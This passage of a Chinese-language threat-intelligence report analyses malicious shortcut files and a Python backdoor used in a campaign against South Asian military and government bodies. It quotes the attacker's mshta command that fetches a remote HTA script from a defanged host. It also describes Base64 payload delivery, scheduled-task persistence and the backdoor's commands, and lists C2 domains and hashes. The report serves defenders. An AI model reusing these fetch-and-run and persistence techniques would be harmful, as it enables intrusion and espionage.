“折纸”行动:针对南亚多国军政机构的网络攻击
来源:岁月联盟
时间:2020-01-29
图3-18 压缩包存放的恶意快捷方式
表3-5 样例样本3
病毒名称
Trojan[Downloader]/Win32.DownLnk
原始文件名
Eligibilty.pdf.lnk
MD5
791253aded5df197d9db441a6fe2eb4e
文件大小
1.24 KB (1,278 字节)
文件格式
Windows shortcut
最后修改时间
2018:04:12 00:33:56
最后访问时间
2019:10:13 06:50:35
LocalBasePath
C:/Windows/System32/mshta.exe
MachineID
desktop-ottr49k
VT检测结果
16 / 57
快捷方式“Eligibilty.pdf.lnk”的作用为运行远程HTA脚本:
“C:/Windows/System32/mshta.exe http[:]//auniversity.myftp.org/kynZ_FPH4.hta”
“kynZ_FPH4.hta”会继续从“http[:]//auniversity.myftp.org/FPH4”下载正常的PDF文档并打开,然后从“http[:]//auniversity.myftp.org/updat.b64”下载数据,Base64解码得到木马程序,保存至"%appdata%/pdat.exe"并运行。最后添加任务计划,每分钟运行一次"%appdata%/pdat.exe",实现持久化。
图3-19 HTA脚本负责下载后续的PDF白文档和Base64编码的木马程序
PDF掩护文档的主题是介绍“巴基斯坦空军大学校园”:
图3-20 下载并打开的PDF文档展示巴基斯坦空军大学的简介
下载回来的数据包含Base64编码的PE文件,解码后得到Python编写的木马程序:
图3-21 Base64编码的PE数据
表3-6 Python木马样本
病毒名称
Trojan[Backdoor]/Python.SpyGate
原始文件名
pdat.exe
MD5
6A271282FE97322D49E9692891332AD7
处理器架构
Intel 386 or later, and compatibles
文件大小
4.25 MB (4,465,740 字节)
文件格式
Win32 EXE
时间戳
2018-09-04 14:43:33
加壳类型
NO
编译语言
Python
VT检测结果
19 / 69
该木马会搜集系统信息,连接C2:quwa-paf.servehttp.com,支持的指令如表3-7所示:
表3-7 Python木马支持的指令功能
指令
功能
exit
退出木马连接
cd
切换目录
其他
执行C2的下发CMD命令
图3-22 Python木马负责搜集系统信息并支持3种指令
更多相关样本:
更多LNK样本使用的C2是“gov-pk.org”,与第一类样本中的域名“pk-gov.org”一样,都是在2018年8月30日这一天注册的,前后相差一小时。此外,在2018年8月30日至9月2日期间,这两个域名同时开始频繁地在“198.54.117.197—198.54.117.200”这个IP段做解析。也就是说,“gov-pk.org”和“pk-gov.org”基本确定是同一攻击者一次性注册、分批使用的:
图3-23“gov-pk.org”和“pk-gov.org”极可能是一次性注册
排查“gov-pk.org”时发现以下链接:
1. “http[:]//pakcert.gov-pk.org/CNS_Guidelines_2019.zip”, ZIP文件“CNS_Guidelines_2019.zip”包含恶意快捷方式“Cyber_Security.docx.lnk”;
2. “http[:]//pakcert.gov-pk.org/shipment.rar”,RAR文件“shipment.rar”包含恶意快捷方式“Shipment.docx.lnk”。
“Cyber_Security.docx.lnk”和“Shipment.docx.lnk”的行为基本相同,以“Cyber_Security.docx.lnk”为例:
表3-8 样例样本4
病毒名称
Trojan[Downloader]/Win32.DownLnk
原始文件名
Cyber_Security.docx.lnk
MD5
02e81e2ba998919f1716b881505f2a89
文件大小
2.49 KB (2,552 字节)
文件格式
Windows shortcut
创建时间
2018:04:12 00:35:26+01:00
最后修改时间
2018:04:12 00:35:26+01:00
LocalBasePath
C:/Windows/System32/WindowsPowerShell/v1.0/PowerShell.exe
MachineID
desktop-9hlv1qc
VT检测结果
24 / 56
“Cyber_Security.docx.lnk”负责运行远程HTA脚本:http[:]//pakcert.gov-pk.org/zaqxswcderfv.hta:
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] 下一页
